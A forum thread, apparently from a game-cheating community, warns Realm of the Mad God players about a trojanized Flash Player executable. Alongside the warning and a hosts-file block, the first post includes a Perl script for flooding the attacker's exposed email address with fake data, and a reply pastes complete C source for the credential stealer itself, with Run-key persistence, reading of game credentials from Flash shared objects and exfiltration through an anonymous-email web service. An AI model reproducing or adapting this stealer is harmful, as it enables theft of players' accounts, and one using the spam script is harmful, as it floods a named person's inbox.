Warning : dont download rotmg-related EXE anymore

[JustAnoobROTMG]

Its always the same old fart whith his shitload of Youtube accounts

I've seen "REAL" FLASHPLAYER exe trapped using a very advanced method, just to be able to steal rotmg credentials.
No, its not the good old methods you may know. Its kinda sophisticated and requires extended EXE & PE knowledge to be coded.

Func fact: He didnt even coded it, he used a "one button click" tool, as usual..Was easy to identify by googling. Wont name it for obvious reasons.

Filthy lamer

Dont download rotmg-related EXE anymore, not even "flash players".
Go take the flash players on ADOBE WEBSITE, AND CLIENTS HERE AS A SWF.

If you want to spam the dude : naffissekuna5733@gmail.com
I have also a PERL script

YOU CAN ALSO PROTECT YOURSELF BY ADDING

127.0.0.1 anonymouse.org
127.0.0.1 www.anonymouse.org

in your host file

Technical details, non coders dont read :
Flashplayer.exe has a hijacked function who decrypt and load an embebed dll "without using any api" (basically it emulates windows dll loader) and this dll does what he coded.

This dll can do what he wants, here it reads email and password in rotmg.sol, check them on realm website, then post them to a website who will send him a mail with them.

Grodle, tu es vraiment une pauvre merde
Cadeau en PERL , connard:

Code:

##################################
#Subroutine to send custom request
##################################
sub sendRequest()
{
    my $ua = LWP::UserAgent->new();
    $ua->agent($user_agent);
    $ua->proxy(['http', 'ftp'], 'https://127.0.0.1:8118');


    my $header = new HTTP::Headers
        Accept => $accept,
        Content_Type => $content_type,
        Cache_Control => $cache_control,
        Accept_Language => $accept_language;

    my $request = HTTP::Request->new(POST => $url, $header, getrandomdata());

    my $res = $ua->request($request);
    #my $body =  $res->as_string;
    if($res->is_success){
           print "OK: " . $res->status_line ."\n";
        }
    else{
          print "Error: " . $res->status_line ."\n";
    }


    
}

sub getrandomdata
{
    #GENERATE RANDOM EMAIL
    
    my $post_data = "to='naffissekuna5733\@gmail.com'";
    $post_data .= "&subject=Account\:";
    $post_data .= randompart();
    $post_data .= ".";
    
    $post_data .= randompart() . "\@gmail.com";
    $post_data .= "&text=".randompassword();
    
    return $post_data;
}

[kasukali]

Thanks for the warning mate.

[HappyMan20]

I actually just found more of the coding side of this on pastebin.

Code:

#include <dirent.h>
#include <winsock2.h>
#include <windows.h>
#define _GNU_SOURCE
#include <stdio.h>
#include <time.h>
 
int main(int argc, char **argv){       
        char *a = getenv("appdata"), *dd, ee[MAX_PATH];
        asprintf(&dd, "%s\\orape.exe", a);
        GetModuleFileName(NULL, ee, MAX_PATH);
        if(strcmp(ee, dd)){
                CopyFile(ee, dd, 0);
                ShellExecute(NULL, "open", dd, NULL, NULL, SW_SHOWDEFAULT);
                free(dd);
                return 0;
        }
       
        HKEY ff;
    RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &ff);
    RegSetValueEx(ff, "Orape", 0, REG_SZ, dd, sizeof(dd));
        free(dd);
    RegCloseKey(ff);
       
        srand(time(NULL));
       
        WSADATA i;
        WSAStartup(MAKEWORD(2, 2), &i);
        struct sockaddr_in t;
        t.sin_family = AF_INET;
        SOCKET s = socket(t.sin_family, SOCK_STREAM, 0);
        t.sin_port = htons(80);
       
        struct hostent *cc = gethostbyname("www.anonymouse.org");
        memcpy(&t.sin_addr, cc->h_addr_list[0], cc->h_length);
        connect(s, (struct sockaddr *)&t, sizeof(t));
       
        char *b = malloc(sizeof(char) * MAX_PATH);
        sprintf(b, "%s\\Macromedia\\Flash Player\\#SharedObjects\\", a);
       
        DIR *c = opendir(b);
    seekdir(c, 2);
        strcat(b, readdir(c)->d_name);
        closedir(c);
       
        chdir(b);
        free(b);
        char d[]= {"localhost\\RoTMG.sol\n"
               "#localWithNet\\RoTMG.sol\n"
                   "www.realmofthemadgod.com\\RoTMG.sol"};
z:;
        char *e, *f = strtok((e = strdup(d)), "\n");
        FILE *g;
        while(f){
                if((g = fopen(f, "rb"))){
            fseek(g, 0, SEEK_END);
            long h = ftell(g);
            rewind(g);
            char j[h + 1];
            fread(j, 1, h, g);
            fclose(g);
 
            size_t k;
            char m[128], n[20];
            for(int o = 0; o < h + 1; o++){
                if(j[o]     == 'G' &&
                   j[o + 1] == 'U' &&
                   j[o + 2] == 'I' &&
                   j[o + 3] == 'D'){
                    k = (j[o + 5] - 1) / 2;
                    strncpy(m, j + o + 6, k);
                    m[k] = '\0';
                }
                if(j[o]     == 'P' &&
                   j[o + 1] == 'a' &&
                   j[o + 2] == 's' &&
                   j[o + 3] == 's' &&
                   j[o + 4] == 'w' &&
                   j[o + 5] == 'o' &&
                   j[o + 6] == 'r' &&
                   j[o + 7] == 'd'){
                    k = (j[o + 9] - 1) / 2;
                    strncpy(n, j + o + 10, k);
                    n[k] = '\0';
                }
            }
                       
                        char *p, *q;
                        asprintf(&p, "%s//index.html", a);
                        asprintf(&q, "https://realmofthemadgodhrd.appspo*****m/char/list?guid=%s&password=%s", m, n);
                        URLDownloadToFile(NULL, q, p, 0, NULL);
                        free(q);
                        FILE *r = fopen(p, "r");
                        fseek(r, 0, SEEK_END);
                        if(*n && ftell(r) > 64){
                                char *v, *w, *bb;
                                asprintf(&v, "%s//rotmg.txt", a);
                                int aa = asprintf(&w, "to=naffissekuna5733@gmail.com&subject=Account %d&text='%s': '%s',\n", rand(), m, n);
                                asprintf(&bb, "POST /cgi-bin/anon-email.cgi HTTP/1.1\r\n"
                              "Accept: text/html, application/xhtml+xml, image/jxr, */*\r\n"
                              "Referer: https://anonymouse.org/anonemail.html\r\n"
                              "Accept-Language: fr-FR,fr;q=0.5\r\n"
                              "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\n"
                              "Content-Type: application/x-www-form-urlencoded\r\n"
                              "Accept-Encoding: gzip, deflate\r\n"
                              "Content-Length: %d\r\n"
                              "Host: anonymouse.org\r\n"
                              "Connection: Keep-Alive\r\n"
                              "Pragma: no-cache\r\n\r\n%s", aa, w);
                                FILE *x;
                                if((x = fopen(v, "r"))){
                                        fseek(x, 0, SEEK_END);
                                        char y[ftell(x) + 1];
                                        rewind(x);
                                        fgets(y, sizeof(y), x);
 
                                        if(!strstr(y, w)){
                                                send(s, bb, strlen(bb), 0);
                                                x = fopen(v, "a");
                                                fputs(w, x);
                                        }
                                } else {
                                        send(s, bb, strlen(bb), 0);
                                        x = fopen(v, "w");
                                        fputs(w, x);
                                }
                                free(p);
                                free(v);
                                free(w);
                                free(bb);
                                fclose(x);
                        }
                        fclose(r);
                }
                f = strtok(NULL, "\n");
        }
        free(e);
        Sleep(10);
        goto z;
        closesocket(s);
        WSACleanup();
        return 0;
}